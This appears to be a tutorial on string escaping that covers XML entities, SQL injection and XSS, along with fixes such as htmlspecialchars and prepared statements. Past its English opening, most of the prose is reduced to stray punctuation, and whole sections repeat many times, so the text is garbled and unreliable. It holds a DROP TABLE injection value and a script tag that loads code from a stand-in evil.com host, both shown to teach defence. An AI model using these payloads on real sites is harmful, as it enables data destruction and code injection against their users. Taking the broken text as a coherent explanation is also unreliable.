⬆️ ⬇️

Escaping (or what you need to know to work with text in the text)

SQL injections, cross-site request forgery, corrupted XML ... Scary, scary things that we all would like to protect against, but I’d just know why this all happens. This article explains the fundamental concept behind all of this: strings and the handling of strings within strings.



Main problem



This is just a text. Yes, just a text - this is the main problem. Practically everything in a computer system is represented by text (which, in turn, is represented by bytes). Is that some texts are designed for the computer, while others - for people. But those and those still remain text. To understand what I'm talking about, I will give a small example:

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Suppose, there is the English text, which I don't wanna translate into Russian </contents> </article> 


Do not believe it: this is the text. Some people call it XML, but this is just text. It may not be suitable for showing an English teacher, but this is still just a text. You can print it on a poster and go to rallies with it, you can write it in a letter to your mom ... this is a text.



However, we want certain parts of this text to have some meaning for our computer. We want the computer to be able to extract the author of the text and the text itself, so that you can do something with it. For example, convert the above into this:

  Suppose, there is the English text, which I don't wanna translate into Russian by Homo Sapiens 


How does the computer know how to do this? Well, because we very incidentally wrapped certain parts of the text with special words in funny brackets, such as, for example, . Since we did this, we can write a program that would search for these specific parts, extract the text and use it for some of our own inventions.

')

In other words, we used certain rules in our text to denote some special meaning that someone, following the same rules, could use.

Okay, this is not so difficult to understand. But what if we want to use these funny brackets that have some special meaning in our text, but without using this very value? .. Something like this:

 <?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article> 


The characters "<" and ">" are nothing special. They can legally be used anywhere, in any text, as in the example above. But what about our idea of ​​special words like
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





